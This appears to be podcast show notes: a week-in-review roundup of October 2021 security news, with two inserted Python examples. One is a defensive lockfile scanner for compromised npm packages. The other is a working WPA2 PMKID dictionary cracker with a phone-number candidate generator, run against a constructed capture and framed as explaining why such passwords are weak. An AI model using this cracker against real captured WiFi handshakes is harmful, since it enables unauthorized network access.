
Cyber Security Headlines – Week in Review – Oct 25-29, 2021

This week’s Cyber Security Headlines – Week in Review, Oct 25-29, is hosted by Rich Stroffolino with our guest, Jason Fruge, CISO, Rent-a-Center

Cyber Security Headlines – Week in Review is live every Friday at 12:30pm PT/3:30pm ET. Join us each week by registering for the open discussion.

Crypto-miner and malware found hidden inside npm libraries

Sonatype has uncovered crypto-mining malware hidden inside three JavaScript libraries uploaded to the official npm package repository. The three packages, disguised as user-agent string parsers, detect the user’s operating system and then run a .bat or shell script depending on the victim’s platform, downloading an externally hosted Windows EXE or Linux ELF and executing the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to use. The three npm packages were klow, klown, and okhsa, and they were live for only a day, on October 15. In a related but separate story, a critical-severity advisory was posted on GitHub on Friday and referenced on CISA’s website, warning of embedded malware in three versions of ua-parser-js, a library used in apps and websites to identify the type of device or browser a person is using from User-Agent data. CISA urges users and administrators running the compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions.

(The Record, CISA, and GitHub)
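A practical first check after a story like this is to look for the named packages in a project’s lockfile rather than in package.json, because a caret range such as "^0.7.28" silently resolves to the poisoned 0.7.29 patch release. The scanner below is an added example, not code from Sonatype, GitHub or CISA; the package-lock.json it reads is constructed for the demo, and the version list is taken from the story (klow, klown and okhsa are flagged in every version since they were malicious from the start).

```python
"""Scan a package-lock.json for the npm packages named in this story."""
import json

# Packages/versions from the advisory; "*" means every published version is malicious.
COMPROMISED = {
    "ua-parser-js": {"0.7.29", "0.8.0", "1.0.0"},
    "klow": {"*"},
    "klown": {"*"},
    "okhsa": {"*"},
}


def _walk_v1(deps, parent):
    """lockfileVersion 1: nested 'dependencies' trees; yield (name, version, path) depth-first."""
    for name, meta in deps.items():
        path = parent + "node_modules/" + name
        yield name, meta.get("version", ""), path
        yield from _walk_v1(meta.get("dependencies", {}), path + "/")


def iter_lockfile_packages(lock):
    """Yield (name, version, path) for every resolved package in a package-lock.json.
    lockfileVersion 2/3 keep a flat 'packages' map keyed by install path; v1 nests
    'dependencies'. v2 carries both, so prefer 'packages' to avoid double counting."""
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            if not path:  # "" is the root project itself, not a dependency
                continue
            # "node_modules/a/node_modules/@scope/b" -> "@scope/b"
            name = meta.get("name") or path.split("node_modules/")[-1]
            yield name, meta.get("version", ""), path
    else:
        yield from _walk_v1(lock.get("dependencies", {}), "")


def find_compromised(lock):
    """Return [(name, version, path)] for every installed package on the bad list."""
    hits = []
    for name, version, path in iter_lockfile_packages(lock):
        bad = COMPROMISED.get(name)
        if bad and ("*" in bad or version in bad):
            hits.append((name, version, path))
    return hits


def scan_file(path):
    with open(path, encoding="utf-8") as fh:
        return find_compromised(json.load(fh))


# Constructed sample lockfile (v2). The root asked for "^0.7.28", which resolved to 0.7.29;
# a second, nested copy stayed on the clean 0.7.28 and must not be flagged.
SAMPLE_LOCK = json.loads("""{
  "name": "demo-app", "lockfileVersion": 2, "requires": true,
  "packages": {
    "": {"name": "demo-app", "version": "1.0.0",
         "dependencies": {"ua-parser-js": "^0.7.28", "express": "^4.17.1"}},
    "node_modules/ua-parser-js": {"version": "0.7.29",
      "resolved": "https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.29.tgz"},
    "node_modules/express": {"version": "4.17.1"},
    "node_modules/some-tool": {"version": "2.0.0"},
    "node_modules/some-tool/node_modules/ua-parser-js": {"version": "0.7.28"}
  }
}""")

if __name__ == "__main__":
    for name, version, path in find_compromised(SAMPLE_LOCK):
        print(f"COMPROMISED {name}@{version} at {path}")
```

Run it against every lockfile in CI, not just the top-level one: the transitive copy is the one nobody requested on purpose. A hit on ua-parser-js means the build host that ran npm install should be treated as compromised, since the malicious versions executed at install time, not at runtime.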

Facebook sues Ukrainian who scraped the data of 178 million users

Facebook alleges that Alexander Alexandrovich Solonchenko of Kirovograd, Ukraine abused a feature of Facebook Messenger called Contact Importer, which allows users to synchronize their phone address books to find friends. Between January 2018 and September 2019, Solonchenko allegedly used an automated tool to pose as Android devices in order to feed Facebook servers with millions of random phone numbers. As Facebook servers returned information for which phone numbers had an account on the site, Solonchenko collected the data, which he later offered for sale on RaidForums.

(The Record)

BlackMatter ransomware victims quietly helped using secret decryptor

Soon after the BlackMatter ransomware operation launched, Emsisoft discovered a flaw that allowed it to build a decryptor and recover victims’ files. Emsisoft immediately alerted law enforcement, ransomware negotiation firms, incident response firms, CERTs worldwide, and trusted partners about the decryptor, choosing to keep things quiet so as not to alert the ransomware gang to the flaw. As victims started refusing to pay, BlackMatter grew increasingly suspicious of and angry with ransomware negotiators, to the point of sending death threats.

(Bleeping Computer)

Microsoft report on Nobelium

Microsoft announced that the Nobelium threat group, previously behind the SolarWinds supply chain attack, has breached at least 14 managed service and cloud providers since May 2021. Overall, Microsoft said 609 customers were notified of 22,868 attacks between July and October, although Nobelium saw only a low single-digit success rate. To put the scale of this activity into context, Microsoft said this is more than all of the notifications about attacks from state-affiliated groups it sent to customers in the three years prior to July 2021. While the group is constantly changing tactics and attack vectors, its overall mission appears to be gaining long-term access to the systems of targets of interest and establishing espionage and exfiltration channels.

Healthcare organizations struggle with breaches

A new report from the Ponemon Institute and SecureLink found that in the last 12 months, 44% of healthcare organizations surveyed have experienced a data breach caused by a third party. Part of the problem comes from the fact that these organizations are not equipped to properly monitor third parties, with only 41% saying they had a comprehensive inventory of third parties with access to critical systems, and only 44% having visibility into levels of access from internal and external users.

(VentureBeat)

Thanks to our episode sponsor, Banyan Security

Today, 75% of enterprises are using some form of hybrid-cloud deployment. Unfortunately, traditional network-centric security solutions like VPNs are not designed to meet the scale, performance, and usability needs of modern organizations, especially those with dynamic hybrid- and multi-cloud environments.
Replace your traditional network access boxes – VPNs, bastion hosts, and gateways – with a cloud-based zero trust remote access solution and enable a safe and reliable “work from anywhere” environment. Visit banyansecurity.io for more information.

Iranian gas stations out of service after cyberattack

The National Iranian Oil Products Distribution Company (NIOPDC), which operates a network of more than 3,500 gas stations across Iran, saw gas station operations come to a halt Tuesday due to a cyberattack, leaving Iranians waiting in gas station lines for hours. As news of the incident spread, a string of hacks on electronic road billboards displayed messages demanding an explanation or asking for fuel. One message, reading “cyberattack 64411”, appears to reference a cyberattack in July that disrupted Iran’s train service. The BBC reports that Iran’s Supreme Council of Cyberspace believes the incident is state-sponsored, although it is too early to say which country is responsible.

(Bleeping Computer)

Researcher cracked 70% of sampled WiFi networks

CyberArk security researcher Ido Hoorvitch managed to crack 70% of a sample of 5,000 WiFi networks in his hometown, Tel Aviv. The researcher roamed the city armed with a $50 network card and a free sniffing setup consisting of Wireshark on Ubuntu to gather hashes, exploiting the fact that many WPA2 access points hand out the PMKID in the first message of the handshake, so the hash can be captured without any client connected. Using a standard laptop and a dictionary attack with the RockYou wordlist, the researcher cracked 3,359 passwords, many of which were the user’s cell phone number or weak passwords made up only of lower-case characters. The research highlights that many home networks are easy to hijack; to better protect them, home users should set passwords at least ten characters long with a mix of lower-case and upper-case letters, symbols and digits. It is also recommended that users disable both roaming and WPS if their router supports them.

(Bleeping Computer)
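The reason a ten-digit phone number fails despite meeting the ten-character advice is the shape of the keyspace, not the length: a 05X-XXXXXXX mobile number has at most 10^8 possibilities, which is tiny compared to a ten-character mixed-case-plus-symbol password. The code below is an added example, not CyberArk’s tooling or the hashcat code it used; it computes the WPA2 PMK (PBKDF2-HMAC-SHA1 over the SSID, 4096 iterations) and the PMKID (HMAC-SHA1 of "PMK Name" plus both MACs, truncated to 128 bits), then runs a dictionary attack that mixes a few wordlist entries with a phone-number-shaped candidate generator. The SSID, MAC addresses and passphrase are constructed for the demo; the hashcat 22000 line format is given as I know it and should be checked against hashcat’s own documentation before relying on it.

```python
"""WPA2 PMKID computation and a small dictionary attack against a constructed capture."""
import hashlib
import hmac
import itertools


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK for WPA2-PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC): first 16 bytes of the HMAC."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hashcat_22000_line(target: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Emit the PMKID in hashcat's -m 22000 line format (assumed layout: WPA*01*PMKID*AP*STA*ESSIDhex***)."""
    return "WPA*01*%s*%s*%s*%s***" % (target.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())


def crack_pmkid(target: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes, candidates):
    """Return the first candidate whose PMKID matches, or None. Skips strings that cannot be a
    WPA2 passphrase (8..63 characters), which also trims short wordlist junk for free."""
    for pw in candidates:
        if not 8 <= len(pw) <= 63:
            continue
        if hmac.compare_digest(pmkid(wpa2_pmk(pw, ssid), ap_mac, sta_mac), target):
            return pw
    return None


def phone_number_candidates(prefix: str, start: int, stop: int, total_len: int = 10):
    """Yield phone-number-shaped passphrases: prefix followed by a zero-padded counter.
    Over a full 05X prefix this is 10^7 candidates; the range here is bounded for the demo."""
    width = total_len - len(prefix)
    for n in range(start, stop):
        yield prefix + str(n).zfill(width)


# Constructed "capture": an AP, a station, and the passphrase the demo will recover.
SSID = "HomeNet-5G"
AP_MAC = bytes.fromhex("aabbccddeeff")
STA_MAC = bytes.fromhex("112233445566")
TRUE_PASSPHRASE = "0541234567"  # constructed; phone-number-shaped, ten digits long
CAPTURED_PMKID = pmkid(wpa2_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC)

# A few RockYou-style entries (constructed list, not the real file) plus a phone-number sweep.
SMALL_WORDLIST = ["12345678", "password", "qwerty123", "iloveyou", "letmein12"]


def demo():
    """Dictionary attack: wordlist first, then a slice of 054-123-XXXX numbers that contains the answer."""
    candidates = itertools.chain(SMALL_WORDLIST, phone_number_candidates("054123", 4500, 4700))
    return crack_pmkid(CAPTURED_PMKID, SSID, AP_MAC, STA_MAC, candidates)


if __name__ == "__main__":
    print(hashcat_22000_line(CAPTURED_PMKID, AP_MAC, STA_MAC, SSID))
    print("recovered:", demo())
```

The per-candidate cost is the 4096-round PBKDF2, which is why this is done on a GPU in practice: a single modern card manages on the order of a million WPA candidates per second, so a whole mobile-number prefix falls in minutes, and the PMKID makes the capture step trivial because no client has to be deauthenticated. A random passphrase of the length the article recommends is out of reach of the same hardware by many orders of magnitude.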


Half of home workers buy potentially insecure technology 

Incidents of shadow IT have snowballed during the pandemic as remote workers bought devices without vetting from the IT department, a new report from HP has warned. Based on a global survey of 1,100 IT decision-makers and a separate poll of more than 8,400 home workers in the US, the UK, Mexico, Germany, Australia, Canada, and Japan, 45% said they had bought IT equipment such as printers or PCs to support home working over the past year. However, 68% said security was not as big a consideration as other factors like price or functionality when purchasing, and 43% did not have their new laptop or PC checked or installed by IT. The report also says 70% of home workers who had clicked on malicious phishing emails did not report it to IT.

(Infosecurity Magazine)

Nearly all US execs have experienced a cybersecurity threat, but some say there’s still no plan

On Tuesday, Deloitte published the results of a new survey, taking place between June 6 and August 24, 2021, which includes the responses of 577 C-suite executives worldwide (159 in the US). The research — including insight from those in CEO, CISO, and other leadership roles — suggests that 98% of US executives have come across at least one cybersecurity event over the past year. The research suggests that the common consequences experienced by today’s firms after an incident include disruption, a drop in share value, intellectual property theft, damage to reputation that prompts a loss in customer trust, and a change in leadership roles. Of interest in the report is that rather than malware, phishing, or data breaches being a top concern, 27% of executives said they were most worried about the actions of “well-meaning” employees who may inadvertently create avenues for attackers to exploit.
